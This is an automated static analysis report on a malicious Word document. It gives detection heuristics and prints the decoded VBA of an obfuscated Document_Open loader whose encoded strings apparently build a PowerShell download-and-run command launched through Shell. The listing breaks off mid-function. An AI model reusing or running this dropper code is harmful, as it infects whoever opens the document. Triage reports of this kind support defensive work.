Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ca6b0f0e6a208f50…

MALICIOUS

Office (OLE)

Size: 328.0 KB
Created: 2018-04-10 21:17:00
Authoring application: Microsoft Office Word
First seen: 2018-04-30
MD5: 735ff3c5d1890ca9c52970fefb2a13b5
SHA-1: d2409bf86846d3b78fb92ebfdefe5ea1c07a0783
SHA-256: ca6b0f0e6a208f506b109e77842a3b6673472e3d1496f2f30adb87298107cd6d
Risk Score: 252

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1059 Command and Scripting Interpreter

The sample is a Microsoft Office document containing heavily obfuscated VBA macros. The 'Document_Open' macro is present and configured to execute code, indicated by critical heuristic firings for 'Potential Shell call in VBA' and 'Obfuscated auto-exec VBA loader'. The presence of 'macros.bas' and the ClamAV detection name 'Doc.Malware.Chronos-6897935-0' further support its malicious nature. The script's obfuscation and use of `Shell` indicate it's likely a downloader for a second-stage payload.

Heuristics 8

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
            ElseIf GkLj = 3360 Then
                Shell (StrReverse(StrReverse(GXbK))), 0
            axPeyx = StrReverse("pwzrDoeuZzscmIyllS")
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
            ElseIf GkLj = 3360 Then
                Shell (StrReverse(StrReverse(GXbK))), 0
            axPeyx = StrReverse("pwzrDoeuZzscmIyllS")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    drScMeM = Replace("OykHXkkdeoisLKcVh", "OykH", "CIGL")
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ (In document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (In document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (In document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 21691 bytes
SHA-256: 12a33bf1eb375370f5c4c625626c050b50e3ac910e32d438d93e11a4950a8e25
Detection
ClamAV: No threats found
Obfuscation or payload: likely
395 of 511 identifiers look randomly generated (e.g. 'XPodevrgSkEYlIBGAaSRPsqG') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
drScMeM = Replace("OykHXkkdeoisLKcVh", "OykH", "CIGL")
    Do While UebuY < 97
        tMuv = Replace("TQwuXwziFsYZCFIiGuW", "TQw", "QSYR")
        tMuv = Replace("dXQvOxTfkWOLApHpQiK", "dXQv", "FjGOt")
        tMuv = Replace("BJwnnuzhUX", "BJw", "oALU")
        tMuv = StrReverse("ORMkjOgBCrkKj")
        tMuv = StrReverse("ZOBESfHEgTC")
        tMuv = "wlLcGCGrKc"
        tMuv = "YMRYQeyO"
        tMuv = "esphHjpwcPms"
        tMuv = "rkOCcAJO"
        tMuv = "aeIqQxzCf"
        tMuv = Replace("VOrhmmLpUcZx", "VOrh", "yXGj")
        tMuv = StrReverse("rBhwzLmcDdmJjCy")
        tMuv = Replace("fmRUfSplYQ", "fmRU", "MvDFnQH")
        tMuv = Replace("LVIHpnIGsuSbKPzDq", "LVI", "IUXwRT")
        tMuv = StrReverse("EFQxgYOpmIwofdYlo")
        tMuv = StrReverse("WgfpRmblgdvJH")
        tMuv = Replace("aOiiVWeEWRdR", "aOi", "wzIzwnE")
        tMuv = StrReverse("crYsDLGSFlOhttCdR")
        tMuv = Replace("IOMzcXXTDw", "IOMz", "iTygfq")
        tMuv = StrReverse("uaeOwYAiRWgKMR")
        tMuv = Replace("TQaiVAwgCXPRlvx", "TQa", "KmSek")
        tMuv = "qQabVL"
        tMuv = "PszGRlGQ"
        tMuv = Replace("nQrAjGwwaZkrZEUPF", "nQrA", "YMcI")
        tMuv = Replace("xXrQzUogrVGFn", "xXr", "nOWRbo")
    UebuY = UebuY + 1
    Loop
    For HhfRH = 0 To 293
        Xjmy = "iIXBJcQ"
        Xjmy = "dEealrsJn"
        Xjmy = "vptxrQxGP"
        Xjmy = StrReverse("uWXPtfPYgzYpVMx")
        Xjmy = StrReverse("TOYTtydfaSfE")
        Xjmy = StrReverse("rILTEOzgWVvKIg")
        Xjmy = StrReverse("shhDcFZBblnJb")
        Xjmy = Replace("AqjVPfPhoVTyTsq", "Aqj", "uDjG")
        Xjmy = Replace("cbPqhLFYdnrzAR", "cbP", "JeSGsu")
        Xjmy = StrReverse("qRbvatofFTTnBem")
        Xjmy = "rHvLzguM"
        Xjmy = "zAGLSyx"
        Xjmy = Replace("DJwtlUZLfWTQCYZcV", "DJwt", "lEolj")
        Xjmy = Replace("LGQmmGTbLHgcYanosWC", "LGQ", "KZtj")
        Xjmy = Replace("sgflOZbgyTUJHU", "sgf", "azvr")
        Xjmy = StrReverse("ZSAqYOHmjsv")
        Xjmy = Replace("zcpAMVaruYJlqTwm", "zcp", "Mzxnr")
        Xjmy = Replace("OiOvSIAAso", "OiOv", "YuklD")
        Xjmy = Replace("iRfETiEZXvDy", "iRfE", "ZGxI")
        Xjmy = "iDuwPX"
        Xjmy = Replace("zFgoiKleSjwSXn", "zFgo", "YvfnKuJ")
        Xjmy = StrReverse("JdOztISxnJUz")
        Xjmy = Replace("nnEipLOlBcgD", "nnE", "WWOH")
        Xjmy = "ILcDWBstL"
        Xjmy = Replace("wRlFfEbxtlLs", "wRlF", "ctvkATL")
    Next HhfRH
    Do While DKMsA < 338
        jtat = Replace("EWPnmOmOfskYi", "EWP", "bOzL")
        jtat = StrReverse("KTjFqeMxgofozo")
        jtat = StrReverse("yjlpPvFUZFypcj")
        jtat = Replace("MbrJDgZWfeLqZ", "MbrJ", "QMtleW")
        jtat = StrReverse("wifdQCSRFDkFcyDzXL")
        jtat = StrReverse("HfiycAEBzJ")
        jtat = Replace("aPgIspBorAqD", "aPg", "eWDvW")
        jtat = StrReverse("cGvEUSUIQAK")
        jtat = "CufVAvL"
        jtat = "RQbxTJHZfvoRD"
        jtat = Replace("YfwseYlBbxccCeXEHTO", "Yfws", "Tpah")
        jtat = StrReverse("QvGJnqGfigxi")
        jtat = StrReverse("ducHOraFjrrXGco")
        jtat = StrReverse("GGbGxxdhsPzSrFszVH")
        jtat = StrReverse("bImzTyHlua")
        jtat = Replace("ftbaDbJXBuesnqfrmt", "ftba", "uDXmC")
        jtat = "qglpEnAnEvA"
        jtat = Replace("pWVFiqRrTsU", "pWVF", "rDVF")
        jtat = Replace("pQMXjqQVyFJXOdI", "pQM", "CViynC")
        jtat = "FourdJ"
        jtat = Replace("gqlfptycnR", "gql", "iikqc")
        jtat = StrReverse("qJGMyjfWaQuv")
        jtat = StrReverse("cPhsUeEkhMwHpLSzDOQ")
        jtat = Replace("XJJljBmCvKKODtlUPu", "XJJl", "DnYB")
        jtat = StrReverse("fbixRKUBOMTQUoKdozh")
    DKMsA = DKMsA + 1
    Loop
mjrexq = StrReverse("ezOjTnonMoQzkmJpaH")
tDXAnH = StrReverse("trrUUUdXPzjxgzX")
kiikcuR = StrReverse("dTxbcMwLLvwVUw")
PvpqKoZ = Replace("mXREZqSwayqBfw", "mXRE", "lVDbvgn")
cWgEaKo = StrReverse("coFvrnVezvWFdcTJCD")
VuqreB = StrReverse("VlrAnBHCHhswyzacAJi")
    Do While CXCXl < 139
        VZhx = StrReverse("cKHbUuTqhwbx")
        VZhx = Replace("IzhVFbeEasu", "Izh", "BePH")
        VZhx = StrReverse("DzJkBTVOxlFSXYZTy")
        VZhx = Replace("CotGTWslHO", "CotG", "RXcDr")
        VZhx = "zqphJBzvIojlC"
        VZhx = StrReverse("aQrnTcfdCrspIQ")
        VZhx = "KWxQgwythig"
        VZhx = "QDenFKroP"
        VZhx = Replace("bguCVSCnGVDdmk", "bgu", "jyfR")
        VZhx = "tdcQvwGt"
        VZhx = StrReverse("FmPrbRKXMAJYiVzWUr")
        VZhx = Replace("uBGTxdfmByka", "uBGT", "OccDR")
        VZhx = StrReverse("bBzGISQXXriqMtQhOq")
        VZhx = Replace("YSqEJZulIvMEhZpEVHm", "YSq", "JWAvw")
        VZhx = Replace("krnchPcqzfC", "krnc", "fVeIIUE")
        VZhx = Replace("ELYvKqjvuJvSFP", "ELY", "jvKHg")
        VZhx = StrReverse("dpnbjKnZOZuTJh")
        VZhx = Replace("JsWRhUCtcZDmlZIl", "JsW", "CEUj")
        VZhx = StrReverse("AvDwsaQREp")
        VZhx = Replace("ImJLuVRRIXMhZMhxOk", "ImJL", "tJWLi")
        VZhx = StrReverse("hgvAohCZbTqdaEMOn")
        VZhx = StrReverse("FPaQJhErnbMGwkQpo")
        VZhx = "zABVrQxAJ"
        VZhx = StrReverse("llOqsLPLZbzXPpqiX")
        VZhx = Replace("PoFWXkOmLdfBlc", "PoF", "BmayfEB")
    CXCXl = CXCXl + 1
    Loop

    While GkLj < 3386
        If GkLj = 28 Then
            TmiPY = TmiPY & lwdPKrR(-1, "YnNpVbRVtKccaOhvSro@xvT`TeiACiUoKHAdC`XPodevrgSkEYlIBGAaSRPsqG@`GUJtynVEAqHyWmqjY`HCIbJVBASYfYGw")
        ElseIf GkLj = 2782 Then
            yEmE = Replace("qFOpwhwPlX", "qFO", "QwVLS")
        WqxZqJ = Replace("thLOonlmmJWsrBCO", "thLO", "ZbJC")
        WqxZqJ = Replace("LmnMrWZUdZy", "Lmn", "HrBmQb")
        ElseIf GkLj = 2316 Then
            yEmE = Replace("pWGcuSDHlp", "pWG", "IzPOB")
        pupoAW = StrReverse("dIMAnZuvcqxKEi")
        pupoAW = StrReverse("FBmhrYjCuYcCx")
        ElseIf GkLj = 378 Then
            yEmE = Replace("FDbDQbeMnQ", "FDb", "KjLqd")
        ZJojVw = "pbzpgtVwXZnAp"
        ZJojVw = Replace("KFeVvUDYICoyymon", "KFeV", "BEZmCMw")
        ElseIf GkLj = 521 Then
            yEmE = Replace("mISJgDmAQs", "mIS", "BPqaa")
        APLBKP = StrReverse("cJYxOmwwjKnQo")
        APLBKP = Replace("IDReATDzDkvOKlt", "IDR", "wJwcQpY")
        ElseIf GkLj = 2723 Then
            yEmE = Replace("yvjxqItTTB", "yvj", "ifJPW")
        YWAVTG = StrReverse("gfAtbsadoLz")
        YWAVTG = Replace("xKhOjhUxKnJsYesvf", "xKh", "lryv")
        ElseIf GkLj = 1042 Then
            yEmE = Replace("sjXwGVtstH", "sjX", "fhbcv")
        JRfcKp = StrReverse("XwDzFPudBG")
        JRfcKp = "xsJOYnjWh"
        ElseIf GkLj = 3209 Then
            cEdO = Split(Replace(TmiPY, "ehOGp", "ttc"), Chr(121 + 3))(0)
        Tfxzrw = StrReverse("lMTYetgWYeGK")
        Tfxzrw = StrReverse("XRdQnnunBkYoBgpiahM")
        ElseIf GkLj = 2211 Then
            yEmE = Replace("wDleZeshcK", "wDl", "yGfrO")
        tdXjym = Replace("oXCsWWbFlryPDXlRW", "oXCs", "rLhEiRo")
        tdXjym = StrReverse("ogpMhLyBOc")
        ElseIf GkLj = 284 Then
            yEmE = Replace("DWECoOTcjg", "DWE", "pbfHG")
        SfGhIM = Replace("jCQHITuRbZx", "jCQH", "RiuI")
        SfGhIM = StrReverse("sJKEspQWbW")
        ElseIf GkLj = 2895 Then
            yEmE = Replace("LZHBljnHtZ", "LZH", "cLwpl")
        UkhKwp = Replace("oSZwREiYsuvSoqtGRns", "oSZw", "ykFAL")
        UkhKwp = Replace("LLaoDTkMWbumzMPCRY", "LLa", "dQYDyM")
        ElseIf GkLj = 1800 Then
            yEmE = Replace("cXlbllAyjW", "cXl", "HnnIO")
        SrwgZP = Replace("VBrqwuwYqPgTzAi", "VBr", "ptCGY")
        SrwgZP = Replace("KlcmPZBVuYmarFsL", "Klc", "zKIG")
        ElseIf GkLj = 2052 Then
            yEmE = Replace("dBOQFjuHCv", "dBO", "tnhIb")
        IvvVjS = Replace("iwsnGuWxhzJGKqfI", "iwsn", "bYjUGtH")
        IvvVjS = Replace("IdqgYAlbmeUIQvV", "Idqg", "cCrdmy")
        ElseIf GkLj = 1645 Then
            yEmE = Replace("vTtQObbaCI", "vTt", "frSRQ")
        dsTksL = Replace("oeVkzWvlasOZvtkf", "oeV", "kznK")
        dsTksL = StrReverse("WWsgeErSSQDHEbhdpp")
        ElseIf GkLj = 1309 Then
            yEmE = Replace("sJlidGizOc", "sJl", "ygCsg")
        YKAZUD = Replace("hJSmhoOHXCe", "hJSm", "MxiYFm")
        YKAZUD = StrReverse("QUrqyAgfrWzmRUXPhv")
        ElseIf GkLj = 2603 Then
            yEmE = Replace("edTapxDlbU", "edT", "txsHI")
        QQazLG = "nyTXrRdPMJbH"
        QQazLG = Replace("tRoKROQuypbZzeLyiBj", "tRo", "ntrUf")
        ElseIf GkLj = 2876 Then
            yEmE = Replace("PEScYSTRwr", "PES", "Bhxba")
        POVqCV = StrReverse("UlffJEPXBoxjZVavwum")
        POVqCV = Replace("vslksQYeuXKr", "vslk", "wMpl")
        ElseIf GkLj = 678 Then
            yEmE = Replace("vaEruJIkmx", "vaE", "mdcOE")
        xlmHDX = StrReverse("IupAqrjcva")
        xlmHDX = "wDugsZ"
        ElseIf GkLj = 2833 Then
            yEmE = Replace("RysCVxOuSz", "Rys", "LrgjW")
        GDZUcQ = Replace("hlJkeFBCzZuQlBPSCK", "hlJ", "SYotc")
        GDZUcQ = Replace("FiPtQGhnrQOOMeFrc", "FiPt", "UrmWIgO")
        ElseIf GkLj = 1908 Then
            yEmE = Replace("RZtfGTOkmp", "RZt", "YlIfH")
        tkJrmz = Replace("fydqmfFWpREpehCI", "fydq", "byeqK")
        tkJrmz = StrReverse("dwkPaGmWSzSZdy")
        ElseIf GkLj = 1146 Then
            yEmE = Replace("cXYcBWxRGK", "cXY", "GckHK")
        uHTgyi = "EPYDXBFiLW"
        uHTgyi = "MgtEPid"
        ElseIf GkLj = 103 Then
            TmiPY = TmiPY & lwdPKrR(-1, "dBij{:(&dwd-Xhfq[&*('gs`OoldSsdF99\gs`O-NH-ldsrxRZ' gs`odkhE, rrdbnqO,sq`sR 0 v, dwd-kkdgrqdvno:((")
        AcFGSd = StrReverse("kkByviOSZMuy")
        AcFGSd = Replace("lBbrZHKuGk", "lBbr", "rdwrpI")
        ElseIf GkLj = 1764 Then
            yEmE = Replace("ZksBQsVmsi", "Zks", "OdUsK")
        GWdXzs = StrReverse("yWboPcokAfLwZ")
        GWdXzs = "HcjvpFqryPrbG"
        ElseIf GkLj = 260 Then
            TmiPY = TmiPY & lwdPKrR(-1, "dkhEc`nkmvnC-(smdhkBadV-sdM-ldsrxR sbdiaN,vdM' 0 v, dwd-kkdgrqdvno{JByAm{pEal")
        BdBScw = StrReverse("SDTvztGJVFCKusSam")
        BdBScw = "jHWtVD"
        ElseIf GkLj = 2166 Then
            yEmE = Replace("DdLTKZyvMM", "DdL", "yhCny")
        EhWMiT = Replace("ntdtSvcIRyEOO", "ntdt", "TDVuZ")
        EhWMiT = "lXQwITaJCJ"
        ElseIf GkLj = 3300 Then
            GXbK = Replace(Twql, cEdO, Chr(44 + 2))
        kbMqeD = Replace("bDyfkXrrlL", "bDyf", "OngYte")
        kbMqeD = Replace("xmZEFlfPFdOv", "xmZ", "EkSFBFe")
        ElseIf GkLj = 1458 Then
            yEmE = Replace("seeQTqoaDT", "see", "ivewe")
        YPFLKc = Replace("UrzoHxTMciRJzFAhU", "Urz", "ewSMj")
        YPFLKc = StrReverse("IutWGFCynf")
        ElseIf GkLj = 2410 Then
            yEmE = Replace("VBCuRuwYOU", "VBC", "mMtIz")
        ELvLsb = StrReverse("CnnQWKRRTQPdjmOo")
        ELvLsb = Replace("ZKFPwryFys", "ZKF", "jqazy")
        ElseIf GkLj = 758 Then
            yEmE = Replace("FEeOabtaRP", "FEe", "pudys")
        EFyTkm = Replace("YlsqFSDETKmPYGYwHQm", "Ylsq", "owCAjEV")
        EFyTkm = Replace("UPloZOKKalx", "UPlo", "udAegI")
        ElseIf GkLj = 957 Then
            yEmE = Replace("IVAkFkXwzG", "IVA", "BAncE")
        RxWXsO = StrReverse("lAftuOEdbXsbGfxruXb")
        RxWXsO = StrReverse("DrfLfakHCpaCSMmKXVJ")
        ElseIf GkLj = 619 Then
            yEmE = Replace("LTwzGlwPpK", "LTw", "oBJah")
        FeOSVb = StrReverse("aGHkgOzZJUMTYlKpOc")
        FeOSVb = StrReverse("RfgobFGOZmlQUVlfmM")
        ElseIf GkLj = 1016 Then
            yEmE = Replace("PgltvJBtRd", "Pgl", "vEyxY")
        YnhSRU = StrReverse("FbAStBiJziQnV")
        YnhSRU = Replace("hSYoSLhXCRDXfE", "hSYo", "GRCbp")
        ElseIf GkLj = 1374 Then
            yEmE = Replace("iEfqigKOGm", "iEf", "yCDaU")
        HRvwhX = Replace("KMTAOSMSpavjnidf", "KMTA", "PJqj")
        HRvwhX = StrReverse("cvJlyZuIbR")
        ElseIf GkLj = 1510 Then
            yEmE = Replace("DfZucmbgAU", "DfZ", "fuVgn")
        yOaejZ = "LGASWUyiqz"
        yOaejZ = "exgePsB"
        ElseIf GkLj = 1748 Then
            yEmE = Replace("YurTitsmpi", "Yur", "pzKXb")
        nviIgY = StrReverse("kVqbdbqkcRQxooyLh")
        nviIgY = StrReverse("bMIWiRxXeprXKK")
        ElseIf GkLj = 2696 Then
            yEmE = Replace("EKzlDtPhyO", "EKz", "YgFtY")
        tUUrUf = StrReverse("ndhhQsypIsxsnR")
        tUUrUf = StrReverse("HsIsYdvUxiYBfWjE")
        ElseIf GkLj = 474 Then
            yEmE = Replace("ZdrGGUvEnl", "Zdr", "tpaYA")
        woJJSD = Replace("hHRUorVRYJVJ", "hHR", "FyWB")
        woJJSD = StrReverse("lFzMDJqBMYFk")
        ElseIf GkLj = 1707 Then
            yEmE = Replace("AZdrDGhqaX", "AZd", "CyDoc")
        jxTstO = "GgqdaYkdvJPjI"
        jxTstO = Replace("CAnRlZfqiCobLD", "CAnR", "CbnqmC")
        ElseIf GkLj = 2111 Then
            yEmE = Replace("hxXReWfUKd", "hxX", "GEznk")
        mqJzcl = Replace("yRMVqTmFZQsfcmifCD", "yRMV", "Enfrr")
        mqJzcl = Replace("mKcbJtaJyjA", "mKc", "WebkGWn")
        ElseIf GkLj = 1563 Then
            yEmE = Replace("RZOfGQCJRQ", "RZO", "Sxewo")
        rkVEKz = StrReverse("ValenskeJX")
        rkVEKz = StrReverse("JevrlaLhykbxUwW")
        ElseIf GkLj = 849 Then
            yEmE = Replace("CdbixcJzgQ", "Cdb", "CiKCU")
        DynBjx = "aAEYMS"
        DynBjx = StrReverse("RympRPXVDyJas")
        ElseIf GkLj = 2976 Then
            yEmE = Replace("RQTrnnkfym", "RQT", "bxZDv")
        AiiJIb = StrReverse("vsafxHpQXXJ")
        AiiJIb = StrReverse("WemSXJQrnEGOLfXXPIZ")
        ElseIf GkLj = 1547 Then
            yEmE = Replace("EHVEtVYnHd", "EHV", "MmBDJ")
        nyQDIJ = StrReverse("THRqAGVALGKBRtio")
        nyQDIJ = Replace("okvoUZFWxxdjwhGZHIc", "okv", "IxVY")
        ElseIf GkLj = 3266 Then
            Twql = Replace(dfFy, nBzCK, Chr(104) + Chr(116) + Chr(116) + Chr(112))
        PhfaPq = StrReverse("cQFdjowPVjDJTx")
        PhfaPq = Replace("AprzgqEZyIbIjxpZ", "Apr", "leuE")
        ElseIf GkLj = 3065 Then
            TmiPY = Replace(StrReverse(TmiPY), "AlBiT", "Phg")
        YqVXnx = StrReverse("zWKaTyqWwQnzL")
        YqVXnx = "nRukMzsRuguOp"
        ElseIf GkLj = 3076 Then
            dfFy = Split(Replace(TmiPY, "TBmBr", "vaI"), Chr(122 + 2))(3 - 1)
        byWaSZ = Replace("CBGBWxHOwplr", "CBGB", "VCnLYr")
        byWaSZ = Replace("nWXnSRJsKQhikPoirC", "nWX", "qJXxSve")
        ElseIf GkLj = 1277 Then
            yEmE = Replace("dbRWBYgWvB", "dbR", "vTRlz")
        GpQoBa = "seAAEdHDST"
        GpQoBa = Replace("BMDpruTqXAggTd", "BMDp", "oxbgD")
        ElseIf GkLj = 1228 Then
            yEmE = Replace("fZzcPTdqWk", "fZz", "WosmQ")
        dTgqma = Replace("qClaHSoLnPzucLEmTFL", "qCla", "BUdt")
        dTgqma = StrReverse("rXklGQbLzILCu")
        ElseIf GkLj = 3360 Then
            Shell (StrReverse(StrReverse(GXbK))), 0
        axPeyx = StrReverse("pwzrDoeuZzscmIyllS")
        axPeyx = Replace("vFodGTLzGqGgSKnR", "vFo", "Lapt")
        ElseIf GkLj = 1978 Then
            yEmE = Replace("FhdearJVts", "Fhd", "XVLri")
        DJHtrv = StrReverse("rcULRZlAHS")
        DJHtrv = StrReverse("iWGPKSTLhkj")
        ElseIf GkLj = 1834 Then
            yEmE = Replace("HXTyyTFBZj", "HXT", "CHylU")
        kvoJjV = "Ceezkx"
        kvoJjV = StrReverse("WBeQBUlslayYxg")
        ElseIf GkLj = 2201 Then
            yEmE = Replace("fuVTysudwE", "fuV", "JDwsT")
        Ytufbk = "qpuIsmMDTpo"
        Ytufbk = StrReverse("RCZKUynZQUtURAbgyk")
        ElseIf GkLj = 1418 Then
            yEmE = Replace("AMFWrLDJJJ", "AMF", "ubDtC")
        ZVmVEB = StrReverse("omMXufmPSWHaVdSY")
        ZVmVEB = Replace("cTQfmHWOKFK", "cTQf", "HIuP")
        ElseIf GkLj = 2129 Then
            yEmE = Replace("xBsDMWYtaZ", "xBs", "LZbjh")
        KGvrEd = Replace("dieyMzvwojmCdjwBOW", "diey", "LukWTi")
        KGvrEd = StrReverse("VgSoxQWAXqCoahnBVUJ")
        ElseIf GkLj = 3122 Then
            nBzCK = Split(Replace(TmiPY, "MsECy", "Gmg"), Chr(123 + 1))(3 - 2)
        nGAZIP = Replace("eigqDDfVJJyRgUwJn", "eigq", "MApzVgZ")
        nGAZIP = StrReverse("JhJbADEIWtzuLo")
        ElseIf GkLj = 2508 Then
            yEmE = Replace("lQliQnxVxB", "lQl", "swApQ")
        bCYmeF = Replace("oUnFrXRGTRan", "oUnF", "RLYTI")
        bCYmeF = StrReverse("fnJnPvCCAZcJjDfTtB")
        ElseIf GkLj = 2944 Then
            yEmE = Replace("qRfQIKfsoz", "qRf", "yivLU")
        TprQso = StrReverse("hVHPWGglqsFr")
        TprQso = "Pthkft"
        ElseIf GkLj = 392 Then
            yEmE = Replace("BqiGsmLPBg", "Bqi", "PoVve")
        fMPcPe = Replace("bQXZplqRTxBhviHkkCI", "bQXZ", "UcIzSZ")
        fMPcPe = Replace("tbZVBLZQQvGK", "tbZ", "AfAUXde")
        ElseIf GkLj = 151 Then
            TmiPY = TmiPY & lwdPKrR(-1, "&dwd-Xhfq[&*('gs`OoldSsdF99\gs`O-NH-ldsrxRZ'+&fmo-IVr2v.nh-jhmjds-t..9rossg&'")
        twMHuK = StrReverse("JiYRktdPbeQsVBpd")
        twMHuK = Replace("BDWpcVFqBLo", "BDW", "PcAMjUG")
        ElseIf GkLj = 449 Then
            yEmE = Replace("jGwLalzcrg", "jGw", "TbtSB")
        FpVowv = "enhfbd"
        FpVowv = StrReverse("yBiQBTfhXdVyFnsihSY")
        ElseIf GkLj = 319 Then
            yEmE = Replace("wnhiLIohjH", "wnh", "JeLfY")
        ppuUrX = "LZGVxYxYStxTu"
        ppuUrX = Replace("LIIxkaKrXMk", "LIIx", "wSDS")
        End If
        GkLj = GkLj + 1
Wend

    For gtOjt = 0 To 360
        CIoJ = StrReverse("JpPwXgZkjDmHEVZ")
        CIoJ = "YiHAXnK"
        CIoJ = StrReverse("dBmAHnwQitrad")
        CIoJ = Replace("xIrusIjMxH", "xIr", "aVEGF")
        CIoJ = "gQhXHLkU"
        CIoJ = StrReverse("TFdXqDXQqzkQgQk")
        CIoJ = Replace("wGlWTrHpICtrT", "wGlW", "UGWuiTp")
        CIoJ = StrReverse("aIEeSZZabLHjABXl")
        CIoJ = StrReverse("BqDXijJnpqoxVHrelZj")
        CIoJ = Replace("jvdZlHkBSskwd", "jvdZ", "dmoHo")
        CIoJ = "DcjdVa"
        CIoJ = "ZxVaXIPouljn"
        CIoJ = "EEmReMf"
        CIoJ = "sLGeWpOGj"
        CIoJ = Replace("lRVoIxKWoIU", "lRV", "PvLER")
        CIoJ = Replace("yYlElbqSWYf", "yYl", "MSRMLS")
        CIoJ = StrReverse("IohJwywgnFujt")
        CIoJ = StrReverse("CDJBDYxrEWDlRRUUhYM")
        CIoJ = StrReverse("YuOuunekhxrox")
        CIoJ = Replace("qfCyweaBCfrDWZ", "qfC", "fdcoQQA")
        CIoJ = Replace("HblkUSnviG", "Hbl", "OhdY")
        CIoJ = "cJlZxzkkfsZpp"
        CIoJ = Replace("bdZrkEiHrwR", "bdZr", "OJiSpf")
        CIoJ = Replace("nUgyUbszaKSysJXGTKn", "nUgy", "KDOXqxn")
        CIoJ = "kxkvMwmFet"
    Next gtOjt
    Do While yopSE < 391
        ITjp = StrReverse("ptwyuETjfkUs")
        ITjp = "OqYBuCsydtlu"
        ITjp = Replace("BpDXLzCgoPXX", "BpDX", "XYTEH")
        ITjp = Replace("LOcWMqfhyaOwgHlM", "LOc", "UEXtC")
        ITjp = StrReverse("JVZHgsmFhyJH")
        ITjp = StrReverse("LGviaOHiAwcrKxl")
        ITjp = "bIfnXeLY"
        ITjp = "qDoagpz"
        ITjp = StrReverse("IrnMUlLAyn")
        ITjp = "RTdkCPgrMR"
        ITjp = StrReverse("SgrSMpEEtCZWDJoQCvV")
        ITjp = Replace("lvfynmTqacnUOuL", "lvf", "LBnczg")
        ITjp = "rIvytxxVFqtA"
        ITjp = "PzErfcmCYO"
        ITjp = "dYWkbdRocxF"
        ITjp = StrReverse("wJXeeSTeUYVZyHcwInP")
        ITjp = Replace("VofcMMxzzVxeiVzFr", "Vofc", "cTfR")
        ITjp = StrReverse("lTfQkLnQujThujPQUEC")
        ITjp = Replace("XwVPnLkDzoDl", "XwVP", "MKuue")
        ITjp = Replace("aYYwkaVcEkADXyYgxEr", "aYYw", "sdTWYmi")
        ITjp = Replace("pSquhBDyEYEsnQzfg", "pSqu", "Cituy")
        ITjp = StrReverse("EywSTZhKFulcrxh")
        ITjp = Replace("uBqRjMVaiyLvdAj", "uBq", "knZdGHL")
        ITjp = "FsMEkDRvjERR"
        ITjp = "WMgZlyGGTLLU"
    yopSE = yopSE + 1
    Loop

End Sub
Public Function lwdPKrR(sPfSW, jU) As String
    Do While orOuB < 223
        FWJu = StrReverse("kFJMgYItxlAcmABlQR")
        FWJu = Replace("RWByHHlpayBAOqA", "RWBy", "zndtchi")
        FWJu = Replace("botuzbrPHGMoUrYh", "bot", "XtVRygv")
        FWJu = Replace("FnBBOZbwnV", "FnBB", "MDVy")
        FWJu = Replace("USzWOesOxVgv", "USz", "akcsfsY")
        FWJu = "isWeazS"
        FWJu = "ueFERV"
        FWJu = "EhapVsPbs"
        FWJu = Replace("vxWfRddwinaVEaIl", "vxWf", "kIhb")
        FWJu = Replace("cHKuYsQTtFWdR", "cHKu", "GIBR")
        FWJu = StrReverse("okmyAbqDUVqnWfy")
        FWJu = StrReverse("roExDkcitfiohQEhwj")
        FWJu = Replace("slQlyQPXmDtwE", "slQl", "tBwDXJ")
        FWJu = StrReverse("dmxYwSpTaxXGszlB")
        FWJu = Replace("nUWLsScyeKxkGlxMPeI", "nUWL", "qWBXgj")
        FWJu = "XRMdzKWltu"
        FWJu = StrReverse("RtCpavzSmgPskjcT")
        FWJu = StrReverse("IFlfmuGXKoZ")
        FWJu = Replace("IEWrnAJEQUqJ", "IEWr", "FqdEIo")
        FWJu = StrReverse("VqdbQCTWAjJvgI")
        FWJu = Replace("URXitFmVpqSHqnJjIEs", "URXi", "vKury")
        FWJu = StrReverse("pDIKUlBZdYHzX")
        FWJu = StrReverse("ybuzaEIjqPoiguJJ")
        FWJu = StrReverse("odnwleWJGaDTzQgH")
        FWJu = Replace("jlTSccvObsxCZAC", "jlT", "IZok")
    orOuB = orOuB + 1
    Loop
    Dim FbyM() As Byte
    FbyM = StrConv(jU, vbFromUnicode)
    While WaKr <= UBound(FbyM)
        CmHWM = Replace("lmgSUmJAPV", "lmg", "lraWG")
        CmHWM = Replace("mqXUTggwal", "mqX", "LzZcZ")
        FbyM(WaKr) = FbyM(WaKr) - sPfSW
